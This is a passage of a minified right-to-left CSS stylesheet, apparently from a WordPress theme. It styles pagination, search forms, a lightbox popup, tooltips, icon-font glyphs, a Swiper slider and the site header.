rotate(0deg); } 100% { transform: rotate(-360deg); } } .rb-loader.loader-absolute { position: absolute; right: 50%; bottom: 50%; display: block; margin-top: -1.5em; margin-right: -1.5em; } .opacity-animate { -webkit-transition: opacity .25s var(--timing); transition: opacity .25s var(--timing); } .is-invisible { opacity: 0; } .pagination-wrap { position: relative; display: flex; justify-content: center; width: 100%; margin-top: var(--bottom-spacing); padding-right: var(--column-gap, 0); padding-left: var(--column-gap, 0); } .pagination-nextprev > *:first-child { margin-left: 10px; } .pagination-trigger.is-disable { pointer-events: none; opacity: .5; } .loadmore-trigger span, .pagination-trigger, .pagination-wrap .older a, .pagination-wrap .newer a, .pagination-number .page-numbers { line-height: var(--height-34); position: relative; display: inline-flex; align-items: center; flex-flow: row nowrap; padding: var(--padding-40); -webkit-transition: var(--effect); transition: var(--effect); border-radius: var(--round-7); background-color: var(--flex-gray-7); } .pagination-number .page-numbers { border: 1px solid var(--flex-gray-15); background-color: transparent; } .pagination-number .page-numbers { margin: 0 3px; padding: 0 15px; } .pagination-number .page-numbers:not(.prev):not(.next) { padding: 0 10px; } .pagination-number span.page-numbers:not(.dots) { color: #fff; border-color: var(--g-color); background-color: var(--g-color); } .pagination-number span.page-numbers.dots { padding: 0 20px; opacity: .5; border-color: transparent; background-color: transparent; } .pagination-number span.page-numbers { pointer-events: none; } .loadmore-trigger.loading span { opacity: 0; } .pagination-loadmore .rb-loader { font-size: 8px; position: absolute; top: 50%; right: 50%; margin-top: -1.5em; margin-right: -1.5em; } .infinite-trigger { position: relative; display: flex; justify-content: center; width: 100%; min-height: 3em; } .infinite-trigger .rb-loader { position: absolute; top: 0; right: 50%; margin-right: -1.5em; } .page-links { display: flex; align-items: center; justify-content: space-between; } .page-links .post-page-numbers { line-height: var(--height-34); position: relative; display: inline-flex; align-items: center; flex-flow: row nowrap; margin: 0 2px; padding: 0 10px; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none !important; border-radius: var(--round-7); background-color: var(--flex-gray-7); } .page-links a.post-page-numbers:hover { color: var(--absolute-white) !important; } .page-links .text-link-next .post-page-numbers, .page-links .text-link-prev .post-page-numbers { padding: var(--padding-40); } .page-links .post-page-numbers.current { color: var(--absolute-white); background: var(--g-color); } .text-link-next a span { margin-left: 4px; } .text-link-prev a span { margin-right: 4px; } .pagination-simple > * { padding-right: 10px; padding-left: 10px; } .pagination-simple .older:first-child { margin-right: auto; padding-right: 0; padding-left: 0; } .pagination-simple .newer:last-child { margin-left: auto; padding-right: 0; padding-left: 0; } a.page-numbers:hover, .page-links a.post-page-numbers:hover, .pagination-nextprev a:hover, .pagination-wrap:not(.pagination-nextprev):not(.page-links) a:hover span, .pagination-simple a:hover { color: var(--absolute-white); background-color: var(--g-color); -webkit-box-shadow: 0 0 15px var(--g-color-90); box-shadow: 0 0 15px var(--g-color-90); } body .p-wrap.end-list-info { flex: 0 0 100%; max-width: 100%; margin-top: 40px; text-align: center; } .end-list-info i { margin-left: 7px; } .search-form, .wp-block-search__inside-wrapper { position: relative; display: flex; overflow: hidden; align-items: stretch; flex-flow: row nowrap; width: 100%; border-radius: var(--round-7); background-color: var(--flex-gray-7); } .search-form-input { flex-grow: 1; } .search-form input[type='search'] { width: 100%; padding: 15px 5px 15px 15px; background: none !important; } .wp-block-search .wp-block-search__button { margin: 0; } .wp-block-search input[type='search'] { position: relative; width: 100%; padding: 0 20px; border: none; background: none !important; } .widget_block.widget_search form { position: relative; display: flex; overflow: hidden; align-items: stretch; flex-flow: row nowrap; width: 100%; } .widget_search.widget_block input[type='search'] { padding: 10px 20px; } .search-form-icon { display: flex; align-items: center; flex-grow: 0; flex-shrink: 0; justify-content: center; padding: 0 10px; } .search-form-icon i { font-size: var(--em-small); } .search-form-submit { position: relative; display: flex; align-items: center; flex-grow: 0; flex-shrink: 0; justify-content: center; } .search-form-submit:before { position: absolute; top: 50%; right: 0; height: .8em; margin-top: -.4em; content: ''; border-right: 2px solid var(--g-color); } .search-submit, .wp-block-search [type='submit'] { height: 100%; padding: 0 20px; cursor: pointer; -webkit-transition: var(--effect); transition: var(--effect); border: none; background-color: transparent; -webkit-box-shadow: none; box-shadow: none; } .wp-block-search [type='submit'] { border-right: 2px solid var(--g-color); border-top-right-radius: 0; border-bottom-right-radius: 0; } .search-submit:hover, .search-submit:active, .wp-block-search [type='submit']:hover, .wp-block-search [type='submit']:active { color: #fff; background-color: var(--g-color); -webkit-box-shadow: 0 4px 15px var(--g-color-90); box-shadow: 0 4px 15px var(--g-color-90); } .wp-block-search__label { display: none; } .mfp-bg { position: fixed; z-index: 9042; top: 0; right: 0; overflow: hidden; width: 100%; height: 100%; background: var(--dark-accent); } .mfp-wrap { position: fixed; z-index: 9043; top: 0; right: 0; width: 100%; height: 100%; outline: none !important; -webkit-backface-visibility: hidden; } .mfp-container { position: absolute; top: 0; right: 0; box-sizing: border-box; width: 100%; height: 100%; padding: 0 8px; text-align: center; } .mfp-container:before { display: inline-block; height: 100%; content: ''; vertical-align: middle; } .mfp-align-top .mfp-container:before { display: none; } .mfp-content { position: relative; z-index: 1045; display: inline-block; margin: 0 auto; text-align: right; vertical-align: middle; } .mfp-inline-holder .mfp-content, .mfp-ajax-holder .mfp-content { width: 100%; cursor: auto; } .mfp-ajax-cur { cursor: progress; } .mfp-zoom-out-cur, .mfp-zoom-out-cur .mfp-image-holder .mfp-close { cursor: zoom-out; } .mfp-zoom { cursor: zoom-in; } .mfp-auto-cursor .mfp-content { cursor: auto; } .mfp-close, .mfp-arrow, .mfp-preloader, .mfp-counter { -moz-user-select: none; -webkit-user-select: none; user-select: none; } .mfp-loading.mfp-figure { display: none; } .mfp-hide { display: none !important; } .mfp-preloader { position: absolute; z-index: 1044; top: 50%; right: 8px; left: 8px; width: auto; margin-top: -0.8em; text-align: center; color: #ccc; } .mfp-preloader a { color: #ccc; } .mfp-preloader a:hover { color: #fff; } .mfp-s-ready .mfp-preloader { display: none; } .mfp-s-error .mfp-content { display: none; } button::-moz-focus-inner { padding: 0; border: 0; } .mfp-counter { font-size: 12px; line-height: 18px; position: absolute; top: 0; left: 0; white-space: nowrap; color: #ccc; } .mfp-arrow { position: absolute; top: 50%; width: 90px; height: 110px; margin: 0; margin-top: -55px; padding: 0; opacity: 0.65; -webkit-tap-highlight-color: transparent; } .mfp-arrow:active { margin-top: -54px; } .mfp-arrow:hover, .mfp-arrow:focus { opacity: 1; } .mfp-arrow:before, .mfp-arrow:after { position: absolute; top: 0; right: 0; display: block; width: 0; height: 0; margin-top: 35px; margin-right: 35px; content: ''; border: medium inset transparent; } .mfp-arrow:after { top: 8px; border-top-width: 13px; border-bottom-width: 13px; } .mfp-arrow:before { opacity: 0.7; border-top-width: 21px; border-bottom-width: 21px; } .mfp-arrow-left { right: 0; } .mfp-arrow-left:after { margin-right: 31px; border-left: 17px solid #fff; } .mfp-arrow-left:before { margin-right: 25px; border-left: 27px solid #3f3f3f; } .mfp-arrow-right { left: 0; } .mfp-arrow-right:after { margin-right: 39px; border-right: 17px solid #fff; } .mfp-arrow-right:before { border-right: 27px solid #3f3f3f; } .mfp-iframe-holder { padding-top: 40px; padding-bottom: 40px; } .mfp-iframe-holder .mfp-content { line-height: 0; width: 100%; max-width: 900px; } .mfp-iframe-scaler { overflow: hidden; width: 100%; height: 0; padding-top: 56.25%; } .mfp-iframe-scaler iframe { position: absolute; top: 0; right: 0; display: block; width: 100%; height: 100%; background: #000; box-shadow: 0 0 8px rgba(0, 0, 0, 0.6); } img.mfp-img { line-height: 0; display: block; box-sizing: border-box; width: auto; max-width: 100%; height: auto; margin: 0 auto; padding: 40px 0 40px; } .mfp-figure { line-height: 0; } .mfp-figure:after { position: absolute; z-index: -1; top: 40px; right: 0; bottom: 40px; left: 0; display: block; width: auto; height: auto; content: ''; background: #444; box-shadow: 0 0 8px rgba(0, 0, 0, 0.6); } .mfp-figure small { font-size: 12px; line-height: 14px; display: block; color: #bdbdbd; } .mfp-figure figure { margin: 0; } .mfp-bottom-bar { position: absolute; top: 100%; right: 0; width: 100%; margin-top: -36px; cursor: auto; } .mfp-title { line-height: 18px; padding-left: 36px; text-align: right; word-wrap: break-word; color: #f3f3f3; } .mfp-image-holder .mfp-content { max-width: 100%; } .mfp-gallery .mfp-image-holder .mfp-figure { cursor: pointer; } .mfp-bg.popup-animation { -webkit-transition: all .5s var(--timing); transition: all .5s var(--timing); opacity: 0; } .mfp-bg.mfp-ready.popup-animation { opacity: .92; } .mfp-bg.mfp-ready.popup-animation.site-access-popup { opacity: .99; } .mfp-removing.mfp-bg.mfp-ready.popup-animation { opacity: 0 !important; } .popup-animation .mfp-content { -webkit-transition: all .5s var(--timing); transition: all .5s var(--timing); opacity: 0; } .popup-animation.mfp-ready .mfp-content { opacity: 1; } .popup-animation.mfp-removing .mfp-content { opacity: 0; } .tipsy { position: absolute; z-index: 100000; padding: 5px; } .tipsy-inner { font-size: var(--meta-fsize); line-height: 1; max-width: 200px; padding: 7px 10px; text-align: center; color: var(--absolute-white); border-radius: var(--round-3); background-color: var(--dark-accent); } .tipsy-arrow { line-height: 0; position: absolute; width: 0; height: 0; border: 5px dashed var(--dark-accent); } body.rtl .tipsy-e .tipsy-arrow { right: 0; left: auto; -webkit-transform: scale(-1, 1); transform: scale(-1, 1); } .rtl .rbi.rbi-pin:before, .rtl .rbi.rbi-behance:before, .rtl .rbi.rbi-digg:before, .rtl .rbi.rbi-dribbble:before, .rtl .rbi.rbi-instagram:before, .rtl .rbi.rbi-linkedin:before, .rtl .rbi.rbi-pinterest:before, .rtl .rbi.rbi-reddit:before, .rtl .rbi.rbi-skype:before, .rtl .rbi.rbi-soundcloud:before, .rtl .rbi.rbi-spotify:before, .rtl .rbi.rbi-stripe:before, .rtl .rbi.rbi-stumbleupon:before, .rtl .rbi.rbi-telegram:before, .rtl .rbi.rbi-tiktok:before, .rtl .rbi.rbi-tumblr:before, .rtl .rbi.rbi-twitter:before, .rtl .rbi.rbi-viber:before, .rtl .rbi.rbi-vimeo:before, .rtl .rbi.rbi-vk:before, .rtl .rbi.rbi-waze:before, .rtl .rbi.rbi-whatsapp:before, .rtl .rbi.rbi-yelp:before, .rtl .rbi.rbi-youtube:before, .rtl .rbi.rbi-myspace:before, .rtl .rbi.rbi-rss:before, .rtl .rbi.rbi-print:before, .rtl .rbi.rbi-facebook:before { -webkit-transform: none; transform: none; } .tipsy-arrow-n { border-bottom-color: var(--dark-accent); } .tipsy-n .tipsy-arrow { top: 0; right: 50%; margin-right: -5px; border-top: none; border-right-color: transparent; border-bottom-style: solid; border-left-color: transparent; } .tipsy-w .tipsy-arrow { top: 50%; right: 0; margin-top: -5px; border-top-color: transparent; border-right: none; border-bottom-color: transparent; border-left-style: solid; } .tipsy-e .tipsy-arrow { top: 50%; left: 0; margin-top: -5px; border-top-color: transparent; border-right-style: solid; border-bottom-color: transparent; border-left: none; } .tipsy-s .tipsy-arrow { right: 50%; bottom: 0; margin-right: -5px; border-top-style: solid; border-right-color: transparent; border-bottom: none; border-left-color: transparent; } /* ----------------- 3 - Font Icons ----------------- */ @font-face { font-family: 'ruby-icon'; src: url('../fonts/icons.ttf?v=1.1') format('truetype'), url('/../fonts/icons.woff?v=1.1') format('woff'), url('/../fonts/icons.svg?v=1.1#ruby-icon') format('svg'); font-weight: normal; font-style: normal; font-display: swap; } .rbi, [class^='rbi-'], [class='rbi-'] { font-family: 'ruby-icon' !important; font-weight: normal; font-style: normal; font-variant: normal; text-transform: none; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; speak: none; } body.rtl .rbi:before { display: inline-block; -webkit-transform: scale(-1, 1); transform: scale(-1, 1); -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=0, mirror=1)'; } .rbi-copy:before { content: '\e965'; } .rbi-pin:before { content: '\e962'; } .rbi-notification:before { content: '\e95a'; } .rbi-information:before { content: '\e95c'; } .rbi-shield:before { content: '\e95e'; } .rbi-next:before { content: '\e958'; } .rbi-prev:before { content: '\e959'; } .rbi-resize:before { content: '\e961'; } .rbi-help:before { content: '\e95b'; } .rbi-minus-o:before { content: '\e95d'; } .rbi-cancel:before { content: '\e95f'; } .rbi-check:before { content: '\e960'; } .rbi-gallery:before { content: '\e955'; } .rbi-audio:before { content: '\e956'; } .rbi-video:before { content: '\e957'; } .rbi-darrow-top:before { content: '\e94a'; } .rbi-search:before { content: '\e946'; } .rbi-watch:before { content: '\e93a'; } .rbicolorose:before { content: '\e949'; } .rbi-home:before { content: '\e952'; } .rbi-portfolio:before { content: '\e901'; } .rbi-menu:before { content: '\e953'; } .rbi-chart:before { content: '\e929'; } .rbi-suitcase:before { content: '\e94d'; } .rbi-clock:before { content: '\e947'; } .rbi-time:before { content: '\e948'; } .rbi-comment:before { content: '\e945'; } .rbi-email:before { content: '\e908'; } .rbi-share:before { content: '\e94e'; } .rbi-load:before { content: '\e942'; } .rbi-read:before { content: '\e94c'; } .rbi-archive:before { content: '\e944'; } .rbi-tag:before { content: '\e94b'; } .rbi-print:before { content: '\e909'; } .rbi-500px:before { content: '\e90a'; } .rbi-amazon:before { content: '\e90b'; } .rbi-store:before { content: '\e90c'; } .rbi-behance:before { content: '\e90d'; } .rbi-blogger:before { content: '\e90f'; } .rbi-chromecast:before { content: '\e911'; } .rbi-digg:before { content: '\e912'; } .rbi-dribbble:before { content: '\e913'; } .rbi-dropbox:before { content: '\e914'; } .rbi-ebay:before { content: '\e93f'; } .rbi-etsy:before { content: '\e940'; } .rbi-facebook:before { content: '\e915'; } .rbi-messenger:before { content: '\e916'; } .rbi-flickr:before { content: '\e917'; } .rbi-flipboard:before { content: '\e918'; } .rbi-github:before { content: '\e919'; } .rbi-google:before { content: '\e91a'; } .rbi-drive:before { content: '\e91b'; } .rbi-play:before { content: '\e91c'; } .rbi-wallet:before { content: '\e91d'; } .rbi-instagram:before { content: '\e91e'; } .rbi-linkedin:before { content: '\e91f'; } .rbi-mailchimp:before { content: '\e920'; } .rbi-medium:before { content: '\e921'; } .rbi-paypal:before { content: '\e922'; } .rbi-pinterest:before { content: '\e923'; } .rbi-quora:before { content: '\e941'; } .rbi-reddit:before { content: '\e928'; } .rbi-skype:before { content: '\e92a'; } .rbi-snapchat:before { content: '\e92b'; } .rbi-soundcloud:before { content: '\e92c'; } .rbi-spotify:before { content: '\e92d'; } .rbi-stripe:before { content: '\e92e'; } .rbi-stumbleupon:before { content: '\e92f'; } .rbi-telegram:before { content: '\e930'; } .rbi-tiktok:before { content: '\e943'; } .rbi-tripadvisor:before { content: '\e931'; } .rbi-tumblr:before { content: '\e932'; } .rbi-twitch:before { content: '\e933'; } .rbi-twitter:before { content: '\e934'; } .rbi-viber:before { content: '\e936'; } .rbi-vimeo:before { content: '\e937'; } .rbi-vk:before { content: '\e938'; } .rbi-waze:before { content: '\e939'; } .rbi-whatsapp:before { content: '\e93b'; } .rbi-wordpress:before { content: '\e93c'; } .rbi-yelp:before { content: '\e93d'; } .rbi-youtube:before { content: '\e93e'; } .rbi-bookmark-fill:before { content: '\e906'; } .rbi-bookmark:before { content: '\e907'; } .rbi-plus:before { content: '\e900'; } .rbi-cright:before { content: '\e902'; } .rbi-cleft:before { content: '\e903'; } .rbi-cdown:before { content: '\e904'; } .rbi-cup:before { content: '\e905'; } .rbi-thumbs-up:before { content: '\e86d'; } .rbi-minus:before { content: '\e90e'; } .rbi-myspace:before { content: '\30'; } .rbi-heart:before { content: '\6c'; } .rbi-rss:before { content: '\42'; } .rbi-angle-down:before { content: '\e924'; } .rbi-angle-left:before { content: '\e925'; } .rbi-angle-right:before { content: '\e926'; } .rbi-angle-up:before { content: '\e927'; } .rbi-cart:before { content: '\e963'; } .rbi-trash:before { content: '\e964'; } .rbi-via:before { content: '\e935'; } .rbi-trending:before { content: '\e954'; } .rbi-bitcoin:before { content: '\e910'; } .rbi-star-half:before { content: '\e950'; } .rbi-star-o:before { content: '\e94f'; } .rbi-star:before { content: '\e951'; } /* ----------------- 4 - Swiper Slider ----------------- */ .swiper-container { position: relative; z-index: 1; overflow: hidden; margin-right: auto; margin-left: auto; padding: 0; list-style: none; } .pre-load:not(.swiper-container-initialized) { max-height: 0; } .swiper-container-vertical > .swiper-wrapper { flex-direction: column; } .swiper-wrapper { position: relative; z-index: 1; display: flex; box-sizing: content-box; width: 100%; height: 100%; transition-property: transform; } .swiper-container-android .swiper-slide, .swiper-wrapper { transform: translate3d(0px, 0, 0); } .swiper-container-multirow > .swiper-wrapper { flex-wrap: wrap; } .swiper-container-multirow-column > .swiper-wrapper { flex-direction: column; flex-wrap: wrap; } .swiper-container-free-mode > .swiper-wrapper { margin: 0 auto; transition-timing-function: ease-out; } .swiper-container-pointer-events { touch-action: pan-y; } .swiper-container-pointer-events.swiper-container-vertical { touch-action: pan-x; } .swiper-slide { position: relative; flex-shrink: 0; width: 100%; height: 100%; transition-property: transform; } .swiper-slide-invisible-blank { visibility: hidden; } .swiper-container-autoheight, .swiper-container-autoheight .swiper-slide { height: auto; } .swiper-container-autoheight .swiper-wrapper { align-items: flex-start; transition-property: transform, height; } .swiper-container-3d { perspective: 1200px; } .swiper-container-3d .swiper-wrapper, .swiper-container-3d .swiper-slide, .swiper-container-3d .swiper-slide-shadow-left, .swiper-container-3d .swiper-slide-shadow-right, .swiper-container-3d .swiper-slide-shadow-top, .swiper-container-3d .swiper-slide-shadow-bottom, .swiper-container-3d .swiper-cube-shadow { transform-style: preserve-3d; } .swiper-container-3d .swiper-slide-shadow-left, .swiper-container-3d .swiper-slide-shadow-right, .swiper-container-3d .swiper-slide-shadow-top, .swiper-container-3d .swiper-slide-shadow-bottom { position: absolute; z-index: 10; top: 0; right: 0; width: 100%; height: 100%; pointer-events: none; } .swiper-container-3d .swiper-slide-shadow-left { background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0)); } .swiper-container-3d .swiper-slide-shadow-right { background-image: linear-gradient(to left, rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0)); } .swiper-container-3d .swiper-slide-shadow-top { background-image: linear-gradient(to top, rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0)); } .swiper-container-3d .swiper-slide-shadow-bottom { background-image: linear-gradient(to bottom, rgba(0, 0, 0, 0.5), rgba(0, 0, 0, 0)); } .swiper-container-css-mode > .swiper-wrapper { overflow: auto; scrollbar-width: none; -ms-overflow-style: none; } .swiper-container-css-mode > .swiper-wrapper::-webkit-scrollbar { display: none; } .swiper-container-css-mode > .swiper-wrapper > .swiper-slide { scroll-snap-align: start start; } .swiper-container-horizontal.swiper-container-css-mode > .swiper-wrapper { scroll-snap-type: x mandatory; } .swiper-container-vertical.swiper-container-css-mode > .swiper-wrapper { scroll-snap-type: y mandatory; } .swiper-button-prev, .swiper-button-next { position: absolute; z-index: 10; top: 50%; display: flex; align-items: center; justify-content: center; width: calc(var(--swiper-navigation-size) / 44 * 27); height: var(--swiper-navigation-size); margin-top: calc(0px - (var(--swiper-navigation-size) / 2)); cursor: pointer; color: var(--swiper-navigation-color, var(--g-color)); } .swiper-button-prev.swiper-button-disabled, .swiper-button-next.swiper-button-disabled { cursor: auto; pointer-events: none; opacity: 0.35; } .swiper-button-prev:after, .swiper-button-next:after { font-size: var(--swiper-navigation-size); font-variant: initial; line-height: 1; letter-spacing: 0; text-transform: none; } .swiper-button-prev, .swiper-container-rtl .swiper-button-next { right: auto; left: 10px; } .swiper-button-prev:after, .swiper-container-rtl .swiper-button-next:after { content: 'prev'; } .swiper-button-next, .swiper-container-rtl .swiper-button-prev { right: 10px; left: auto; } .swiper-button-next:after, .swiper-container-rtl .swiper-button-prev:after { content: 'next'; } .swiper-button-prev.swiper-button-white, .swiper-button-next.swiper-button-white { --swiper-navigation-color: #fff; } .swiper-button-prev.swiper-button-black, .swiper-button-next.swiper-button-black { --swiper-navigation-color: #000; } .swiper-button-lock { display: none; } .swiper-pagination { position: absolute; z-index: 10; transition: 300ms opacity; transform: translate3d(0, 0, 0); text-align: center; } .swiper-pagination.swiper-pagination-hidden { opacity: 0; } .swiper-pagination-fraction, .swiper-pagination-custom, .swiper-container-horizontal > .swiper-pagination-bullets { right: 0; bottom: 10px; width: 100%; } .swiper-pagination-bullet, body .swiper-pagination-bullet { position: relative; display: inline-block; width: 16px; height: 16px; margin-right: 0; margin-left: 0; -webkit-transition: -webkit-transform .25s var(--timing); transition: transform .25s var(--timing); opacity: .4; background: none; } .swiper-pagination-bullet:before { position: absolute; top: 0; right: 0; width: 100%; height: 100%; content: ''; -webkit-transform: scale(.5); transform: scale(.5); pointer-events: none; color: inherit; -webkit-border-radius: 100%; border-radius: 100%; background: currentColor; } .swiper-pagination-bullet.swiper-pagination-bullet-active { opacity: 1; } .swiper-pagination-bullet.swiper-pagination-bullet-active:before { -webkit-transform: scale(.75); transform: scale(.75); } button.swiper-pagination-bullet { margin: 0; padding: 0; border: none; box-shadow: none; -webkit-appearance: none; appearance: none; } .swiper-pagination-bullet-active { opacity: 1; } .swiper-container-vertical > .swiper-pagination-bullets { top: 50%; left: 10px; transform: translate3d(0px, -50%, 0); } .swiper-container-vertical > .swiper-pagination-bullets .swiper-pagination-bullet { display: block; margin: 6px 0; } .swiper-container-vertical > .swiper-pagination-bullets.swiper-pagination-bullets-dynamic { top: 50%; width: 8px; transform: translateY(-50%); } .swiper-container-vertical > .swiper-pagination-bullets.swiper-pagination-bullets-dynamic .swiper-pagination-bullet { display: inline-block; transition: 200ms transform, 200ms top; } .block-wrap .swiper-container-horizontal > .swiper-pagination-bullets .swiper-pagination-bullet { margin: 0; } .swiper-container-horizontal > .swiper-pagination-bullets.swiper-pagination-bullets-dynamic { right: 50%; transform: translateX(50%); white-space: nowrap; } .swiper-container-horizontal > .swiper-pagination-bullets.swiper-pagination-bullets-dynamic .swiper-pagination-bullet { transition: 200ms transform, 200ms right; } .swiper-container-horizontal.swiper-container-rtl > .swiper-pagination-bullets-dynamic .swiper-pagination-bullet { transition: 200ms transform, 200ms right; } .swiper-pagination-progressbar { position: absolute; background: var(--dark-accent-90); } body .swiper-pagination-progressbar .swiper-pagination-progressbar-fill { position: absolute; top: 0; right: 0; width: 100%; height: 100%; transform: scale(0); transform-origin: right top; background: var(--g-color); } .swiper-container-rtl .swiper-pagination-progressbar .swiper-pagination-progressbar-fill { transform-origin: right top; } .swiper-container-horizontal > .swiper-pagination-progressbar, .swiper-container-vertical > .swiper-pagination-progressbar.swiper-pagination-progressbar-opposite { right: 30%; bottom: 15px; left: 30%; overflow: hidden; height: 3px; border-radius: 5px; } .swiper-container-vertical > .swiper-pagination-progressbar, .swiper-container-horizontal > .swiper-pagination-progressbar.swiper-pagination-progressbar-opposite { top: 0; right: 0; height: 2px; } .swiper-pagination-lock { display: none; } .swiper-scrollbar { position: relative; border-radius: var(--round-7); background: var(--dark-accent-90); -ms-touch-action: none; } .swiper-container-horizontal > .swiper-scrollbar { position: absolute; z-index: 50; right: 1%; bottom: 3px; width: 98%; height: 5px; } .swiper-container-vertical > .swiper-scrollbar { position: absolute; z-index: 50; top: 1%; left: 3px; width: 5px; height: 98%; } .swiper-scrollbar-drag { position: relative; top: 0; right: 0; width: 100%; height: 100%; border-radius: var(--round-7); background: var(--g-color); } .swiper-scrollbar-cursor-drag { cursor: move; } .swiper-scrollbar-lock { display: none; } .swiper-zoom-container { display: flex; align-items: center; justify-content: center; width: 100%; height: 100%; text-align: center; } .swiper-zoom-container > img, .swiper-zoom-container > svg, .swiper-zoom-container > canvas { max-width: 100%; max-height: 100%; object-fit: contain; } .swiper-slide-zoomed { cursor: move; } .swiper-lazy-preloader { position: absolute; z-index: 10; top: 50%; right: 50%; box-sizing: border-box; width: 42px; height: 42px; margin-top: -21px; margin-right: -21px; transform-origin: 50%; animation: swiper-preloader-spin 1s infinite linear; border: 4px solid var(--swiper-preloader-color, var(--g-color)); border-top-color: transparent; border-radius: 50%; } .swiper-lazy-preloader-white { --swiper-preloader-color: #fff; } .swiper-lazy-preloader-black { --swiper-preloader-color: #000; } @keyframes swiper-preloader-spin { 100% { transform: rotate(-360deg); } } .swiper-container .swiper-notification { position: absolute; z-index: -1000; top: 0; right: 0; pointer-events: none; opacity: 0; } .swiper-container-fade.swiper-container-free-mode .swiper-slide { transition-timing-function: ease-out; } .swiper-container-fade .swiper-slide { transition-property: opacity; pointer-events: none; } .swiper-container-fade .swiper-slide .swiper-slide { pointer-events: none; } .swiper-container-fade .swiper-slide-active, .swiper-container-fade .swiper-slide-active .swiper-slide-active { pointer-events: auto; } .swiper-container-cube { overflow: visible; } .swiper-container-cube .swiper-slide { z-index: 1; visibility: hidden; width: 100%; height: 100%; transform-origin: 100% 0; pointer-events: none; -webkit-backface-visibility: hidden; backface-visibility: hidden; } .swiper-container-cube .swiper-slide .swiper-slide { pointer-events: none; } .swiper-container-cube.swiper-container-rtl .swiper-slide { transform-origin: 100% 0; } .swiper-container-cube .swiper-slide-active, .swiper-container-cube .swiper-slide-active .swiper-slide-active { pointer-events: auto; } .swiper-container-cube .swiper-slide-active, .swiper-container-cube .swiper-slide-next, .swiper-container-cube .swiper-slide-prev, .swiper-container-cube .swiper-slide-next + .swiper-slide { visibility: visible; pointer-events: auto; } .swiper-container-cube .swiper-slide-shadow-top, .swiper-container-cube .swiper-slide-shadow-bottom, .swiper-container-cube .swiper-slide-shadow-left, .swiper-container-cube .swiper-slide-shadow-right { z-index: 0; -webkit-backface-visibility: hidden; backface-visibility: hidden; } .swiper-container-cube .swiper-cube-shadow { position: absolute; z-index: 0; right: 0; bottom: 0; width: 100%; height: 100%; opacity: 0.6; } .swiper-container-cube .swiper-cube-shadow:before { position: absolute; top: 0; right: 0; bottom: 0; left: 0; content: ''; background: #000; filter: blur(50px); -webkit-filter: blur(50px); } .swiper-container-flip { overflow: visible; } .swiper-container-flip .swiper-slide { z-index: 1; pointer-events: none; -webkit-backface-visibility: hidden; backface-visibility: hidden; } .swiper-container-flip .swiper-slide .swiper-slide { pointer-events: none; } .swiper-container-flip .swiper-slide-active, .swiper-container-flip .swiper-slide-active .swiper-slide-active { pointer-events: auto; } .swiper-container-flip .swiper-slide-shadow-top, .swiper-container-flip .swiper-slide-shadow-bottom, .swiper-container-flip .swiper-slide-shadow-left, .swiper-container-flip .swiper-slide-shadow-right { z-index: 0; -webkit-backface-visibility: hidden; backface-visibility: hidden; } /* ----------------- 5 - Header ----------------- */ .header-wrap { position: relative; display: block; } .header-fw .navbar-wrap > .rb-container, .header-fw.header-4 .logo-sec > .rb-container { max-width: 100%; } .navbar-wrap { position: relative; z-index: 999; display: block; } .header-mobile { display: none; } #amp-header .header-mobile { display: block; } .navbar-transparent { background-color: transparent; } .navbar-transparent .navbar-inner { border-bottom: 1px solid #ffffff26; } .sticky-on .navbar-transparent .navbar-inner { border-color: transparent; } .navbar-wrap:not(.navbar-transparent), .sticky-on .navbar-wrap { background: var(--nav-bg); background: -webkit-linear-gradient(right, var(--nav-bg-from) 0%, var(--nav-bg-to) 100%); background: linear-gradient(to left, var(--nav-bg-from) 0%, var(--nav-bg-to) 100%); } .style-shadow .navbar-wrap:not(.navbar-transparent), .sticky-on .navbar-wrap { -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .header-fw.style-d-border .navbar-wrap:not(.navbar-transparent):after, .header-fw.style-tbd-border .navbar-wrap:not(.navbar-transparent):after, .header-wrapper.style-d-border .navbar-wrap:not(.navbar-transparent) .navbar-inner:after, .header-wrapper.style-tbd-border .navbar-wrap:not(.navbar-transparent) .navbar-inner:after { position: absolute; right: 0; bottom: 0; left: 0; width: 100%; height: 0; content: ''; pointer-events: none; border-bottom: 2px solid currentColor; } .header-fw.style-border .navbar-wrap:not(.navbar-transparent):after, .header-wrapper.style-border .navbar-wrap:not(.navbar-transparent) .navbar-inner:after { position: absolute; top: auto; right: 0; bottom: 0; left: 0; width: 100%; height: 0; content: ''; pointer-events: none; border-bottom: 1px solid var(--flex-gray-15); } .header-fw.style-tbd-border .navbar-wrap:not(.navbar-transparent):before, .header-wrapper.style-tbd-border .navbar-wrap:not(.navbar-transparent) .navbar-inner:before { position: absolute; top: 0; right: 0; bottom: auto; left: 0; width: 100%; height: 0; content: ''; pointer-events: none; border-bottom: 2px solid currentColor; } .header-4 .navbar-wrap:not(.navbar-transparent):before { position: absolute; top: 0; right: 0; left: 0; width: 100%; height: 0; content: ''; pointer-events: none; border-bottom: 1px solid var(--flex-gray-15); } .header-4 .navbar-wrap:not(.navbar-transparent):after, .header-5.style-tb-border.header-fw .navbar-wrap:not(.navbar-transparent):after, .header-5.style-tb-border.header-wrapper .navbar-wrap:not(.navbar-transparent) .navbar-inner:after { position: absolute; right: 0; bottom: 0; left: 0; width: 100%; height: 0; content: ''; pointer-events: none; border-bottom: 1px solid var(--flex-gray-15); } .header-5.style-tb-shadow-border.header-wrapper .navbar-wrap:not(.navbar-transparent) .navbar-inner:before, .header-5.style-tb-shadow-border.header-fw .navbar-wrap:not(.navbar-transparent):before, .header-5.style-tb-border.header-fw .navbar-wrap:not(.navbar-transparent):before, .header-5.style-tb-border.header-wrapper .navbar-wrap:not(.navbar-transparent) .navbar-inner:before { position: absolute; top: 0; right: 0; bottom: auto; left: 0; width: 100%; height: 0; content: ''; pointer-events: none; border-bottom: 1px solid var(--flex-gray-15); } .header-5.style-tb-shadow-border .navbar-wrap:not(.navbar-transparent) { -webkit-box-shadow: 0 10px 10px var(--shadow-2); box-shadow: 0 10px 10px var(--shadow-2); } .navbar-inner { position: relative; display: flex; display: -webkit-flex; align-items: stretch; flex-flow: row nowrap; justify-content: space-between; max-width: 100%; min-height: var(--nav-height); } .navbar-left, .navbar-right, .navbar-center { display: flex; display: -webkit-flex; 